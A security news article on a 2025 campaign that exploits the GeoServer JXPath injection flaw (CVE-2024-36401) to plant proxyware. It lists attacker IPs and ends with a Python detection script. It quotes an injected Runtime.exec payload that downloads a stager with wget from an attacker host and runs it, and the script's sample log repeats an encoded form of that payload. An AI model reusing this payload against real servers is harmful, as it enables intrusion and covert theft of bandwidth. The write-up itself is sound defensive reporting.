A covert operation surfaced in early March 2025, leveraging a significant remote code execution vulnerability in GeoServer (CVE-2024-36401) to infiltrate publicly accessible geospatial servers.
Perpetrators capitalized on JXPath query injection within the Apache Commons JXPath library, achieving arbitrary code execution via crafted XML requests.
This access point allowed the discreet installation of tailored executables that utilized legitimate passive-income software development kits (SDKs) and tools, effectively turning victim servers into illegal proxy farms.
Shortly after the first wave, Palo Alto Networks analysts observed a notable increase in probing efforts against susceptible GeoServer instances.
Cortex Xpanse telemetry uncovered over 3,700 publicly reachable servers in the first week of May 2025, highlighting the extensive attack surface accessible to threat actors.
These adversaries acted swiftly to avoid detection, rotating distribution IPs from 37.187.74[.]75 to 185.246.84[.]189 and broadening backend infrastructure to include a transfer.sh-style file-sharing service on port 8080.
The monetization tactic behind this initiative prioritized long-term stealth over immediate resource depletion.
Instead of implementing noisy cryptocurrency miners, attackers deployed two primary payloads: a misappropriated SDK that discreetly aggregated bandwidth-sharing sessions among infected devices, and a misused app that generated concealed directories and activated executables with minimal resource usage.
Both payloads emulated legitimate passive-income services, complicating detection through signature-based safeguards.
Victims remained oblivious as their systems silently routed web traffic or engaged in residential proxy networks.
By incorporating authentic Dart-compiled binaries, the attackers capitalized on cross-platform capabilities to target Linux servers and elude detection signatures crafted for more prevalent malware languages.
Indicators of compromise encompassed connections to hxxp://37.187.74[.]75:8080 and hxxp://64.226.112[.]52:8080, where stage-one scripts such as z593 retrieved additional stagers.
Infection Mechanism Deep Dive
One of the most nefarious features of this campaign is its exploitation of JXPath’s extension functions.
Upon receiving a crafted GetPropertyValue request, GeoServer's property accessor mechanism passed an attacker-controlled expression into the iteratePointers method.
This payload subsequently invoked java.lang.Runtime.exec, initiating remote command execution.
A snippet illustrating this injection follows:
<![CDATA[Runtime.exec("wget http://185.246.84.189:8080/z593 -O /tmp/z593; chmod +x /tmp/z593; /tmp/z593")]]>
Upon successful execution, z593 functioned as a stager, creating a concealed folder under /var/tmp/.cache and retrieving two further payloads: z401, which set up the execution environment, and z402, which launched the primary executable with an embedded SDK key.
By chaining these stages, the attackers achieved persistence and ensured that bandwidth-sharing processes resumed automatically upon reboot.
Through this meticulous, multi-stage strategy, threat actors have showcased how utilizing legitimate SDKs and file-sharing services can enable undetected monetization of network resources.
Security teams are advised to apply GeoServer patches immediately, monitor outbound connections to recognized malicious IPs, and implement behavioral analytics capable of identifying abnormal JXPath queries to counter similar campaigns.
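As an added example (not code from the Unit 42 write-up or from GeoServer), the following Python triage script applies the two checks recommended above to constructed log samples: it decodes GeoServer WFS request lines and flags JXPath extension-function tokens such as the Runtime.exec call shown earlier, and matches connection-log endpoints against the campaign hosts named in this article. The log formats, the token list and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Campaign hosts named in the report (defanged there with [.]).
CAMPAIGN_HOSTS = {"37.187.74.75", "185.246.84.189", "64.226.112.52"}
# JXPath extension-function tokens that never belong in a WFS valueReference
# (assumed list; tune it against local traffic before deploying).
JXPATH_TOKENS = re.compile(
    r"java\.lang\.Runtime|getRuntime\s*\(|\.exec\s*\(|ProcessBuilder|/var/tmp/\.cache", re.I)
REQ_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')      # CLF request line
ENDPOINT_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+)")  # ip:port in conn logs

def flag_wfs_request(access_line):
    """Return a reason if a GeoServer request carries JXPath code, else None."""
    m = REQ_RE.search(access_line)
    if not m:
        return None
    path = unquote_plus(m.group(1))  # exploit strings arrive URL-encoded
    if "/geoserver/" not in path.lower():
        return None
    hit = JXPATH_TOKENS.search(path)
    if not hit:
        return None
    op = "GetPropertyValue" if "request=getpropertyvalue" in path.lower() else "other"
    return "jxpath token %r in WFS %s request" % (hit.group(0), op)

def flag_outbound(conn_line):
    """Return 'ip:port' if the line shows a connection to a known campaign host."""
    for ip, port in ENDPOINT_RE.findall(conn_line):
        if ip in CAMPAIGN_HOSTS and port == "8080":
            return "%s:%s" % (ip, port)
    return None

def scan(access_lines, conn_lines):
    """Run both checks and return (source, line_index, reason) tuples."""
    out = [("access", i, r) for i, l in enumerate(access_lines) if (r := flag_wfs_request(l))]
    out += [("conn", i, r) for i, l in enumerate(conn_lines) if (r := flag_outbound(l))]
    return out

# Constructed sample lines (not real telemetry): a benign WFS query, one carrying
# the Runtime.exec stager fetch, a benign connection and one to campaign C2.
ACCESS_LOG = [
    '10.0.0.5 - - [04/Mar/2025:10:12:01 +0000] "GET /geoserver/wfs?service=WFS'
    '&request=GetPropertyValue&typeNames=topp:states&valueReference=STATE_NAME HTTP/1.1" 200 812',
    '203.0.113.9 - - [04/Mar/2025:10:12:07 +0000] "GET /geoserver/wfs?service=WFS'
    '&request=GetPropertyValue&typeNames=topp:states&valueReference=java.lang.Runtime'
    '.exec%28%22wget+http%3A%2F%2F185.246.84.189%3A8080%2Fz593%22%29 HTTP/1.1" 200 412',
]
CONN_LOG = ["tcp 10.0.0.5:51822 -> 203.0.113.20:443 ESTABLISHED",
            "tcp 10.0.0.5:51901 -> 185.246.84.189:8080 ESTABLISHED"]
```

Running `scan(ACCESS_LOG, CONN_LOG)` reports the second access line and the second connection line; a benign GetPropertyValue query and a connection to an unrelated host produce nothing.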